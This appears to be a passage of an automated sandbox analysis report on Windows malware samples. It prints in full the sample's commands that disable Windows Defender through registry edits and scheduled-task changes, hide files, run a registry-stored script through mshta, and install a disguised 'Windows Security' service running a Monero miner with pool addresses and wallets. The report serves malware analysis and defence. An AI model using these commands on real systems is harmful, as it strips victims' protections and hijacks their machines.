PID 4512 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4512 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe

"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Perform\7za.exe

7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU

C:\Perform\update.exe

C:\Perform\update.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"

C:\Perform\Resources\NSudo.exe

C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\Defender.exe

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\nssm.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")

C:\Windows\system32\attrib.exe

attrib +s +h C:\Perform\7za.exe

C:\Perform\nssm.exe

nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"

C:\Perform\nssm.exe

nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffcf0474f50,0x7ffcf0474f60,0x7ffcf0474f70

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1420 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1644 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1700 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 palygamesconsutoria.blogspot.com udp
NL 172.217.168.225:443 palygamesconsutoria.blogspot.com tcp
US 8.8.8.8:53 resources.blogblog.com udp
US 8.8.8.8:53 www.blogger.com udp
NL 172.217.168.233:443 www.blogger.com tcp
NL 172.217.168.233:443 www.blogger.com tcp
NL 172.217.168.225:443 palygamesconsutoria.blogspot.com udp
US 8.8.8.8:53 themes.googleusercontent.com udp
NL 142.251.39.97:443 themes.googleusercontent.com tcp
NL 172.217.168.233:443 www.blogger.com udp
NL 104.80.225.205:443 tcp
GB 51.132.193.104:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp

Files

memory/4512-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat

MD5 55f5a5033d59e83f200f78efd8cf9ffd
SHA1 b153b8f0da50ffc56996bafa0be0610cec8b9d99
SHA256 d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041
SHA512 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047

memory/2248-137-0x0000000000000000-mapping.dmp

memory/2204-138-0x0000000000000000-mapping.dmp

memory/3568-139-0x0000000000000000-mapping.dmp

memory/4468-140-0x0000000000000000-mapping.dmp

memory/1476-141-0x0000000000000000-mapping.dmp

memory/1960-142-0x0000000000000000-mapping.dmp

memory/4220-143-0x0000000000000000-mapping.dmp

memory/3716-144-0x0000000000000000-mapping.dmp

memory/3104-145-0x0000000000000000-mapping.dmp

memory/340-146-0x0000000000000000-mapping.dmp

memory/2664-147-0x0000000000000000-mapping.dmp

memory/4812-148-0x0000000000000000-mapping.dmp

memory/3120-149-0x0000000000000000-mapping.dmp

memory/4276-150-0x0000000000000000-mapping.dmp

memory/3484-151-0x0000000000000000-mapping.dmp

memory/4104-152-0x0000000000000000-mapping.dmp

memory/740-153-0x0000000000000000-mapping.dmp

memory/936-154-0x0000000000000000-mapping.dmp

memory/4640-155-0x0000000000000000-mapping.dmp

memory/4336-156-0x0000000000000000-mapping.dmp

memory/4544-157-0x0000000000000000-mapping.dmp

memory/1456-158-0x0000000000000000-mapping.dmp

memory/3380-159-0x0000000000000000-mapping.dmp

memory/4460-160-0x0000000000000000-mapping.dmp

memory/3616-161-0x0000000000000000-mapping.dmp

memory/3260-162-0x0000000000000000-mapping.dmp

memory/4184-163-0x0000000000000000-mapping.dmp

memory/4516-164-0x0000000000000000-mapping.dmp

memory/3620-165-0x0000000000000000-mapping.dmp

memory/3456-166-0x0000000000000000-mapping.dmp

memory/4736-167-0x0000000000000000-mapping.dmp

memory/4524-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\files.7z

MD5 6380cb936d9229799750c4416ad99a81
SHA1 d1efa33ab91b12e336190774e616f5e420979201
SHA256 f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce
SHA512 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970

C:\Users\Admin\AppData\Local\Temp\7za.exe

MD5 0184e6ebe133ef41a8cc6ef98a263712
SHA1 cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256 dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA512 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

C:\Perform\7za.exe

MD5 0184e6ebe133ef41a8cc6ef98a263712
SHA1 cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256 dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA512 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

memory/4920-171-0x0000000000000000-mapping.dmp

memory/3324-173-0x0000000000000000-mapping.dmp

C:\Perform\update.exe

MD5 0e4afc55e03f8fe26d82e054004c16a3
SHA1 e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256 d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA512 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

C:\Perform\update.exe

MD5 0e4afc55e03f8fe26d82e054004c16a3
SHA1 e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256 d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA512 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

C:\Perform\up.vbs

MD5 9fc9cd6fff29c03e2b164cafe21543a1
SHA1 c348cd40f9e112413a2587ef3036628a056aee13
SHA256 b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1
SHA512 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b

memory/3020-177-0x0000000000000000-mapping.dmp

memory/5104-178-0x0000000000000000-mapping.dmp

memory/4484-179-0x0000000000000000-mapping.dmp

C:\Perform\Resources\NSudo.exe

MD5 5cae01aea8ed390ce9bec17b6c1237e4
SHA1 3a80a49efaac5d839400e4fb8f803243fb39a513
SHA256 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512 c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

memory/3292-181-0x0000000000000000-mapping.dmp

C:\Perform\Defender.exe

MD5 33dcb753b2236649ae2f13d898e8eb5d
SHA1 f9be1a9b50b55d9244e20c8ea79ad276854f461c
SHA256 f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160
SHA512 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731

memory/2116-183-0x0000000000000000-mapping.dmp

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

memory/4804-185-0x0000000000000000-mapping.dmp

memory/3064-186-0x0000000000000000-mapping.dmp

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

memory/4584-187-0x0000000000000000-mapping.dmp

memory/4428-189-0x0000000000000000-mapping.dmp

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

\??\pipe\crashpad_3344_EMRHQGXFHJGRFGJT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral3

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

149s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1112 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\system32\schtasks.exe
PID 1112 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\system32\schtasks.exe
PID 1112 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\system32\schtasks.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
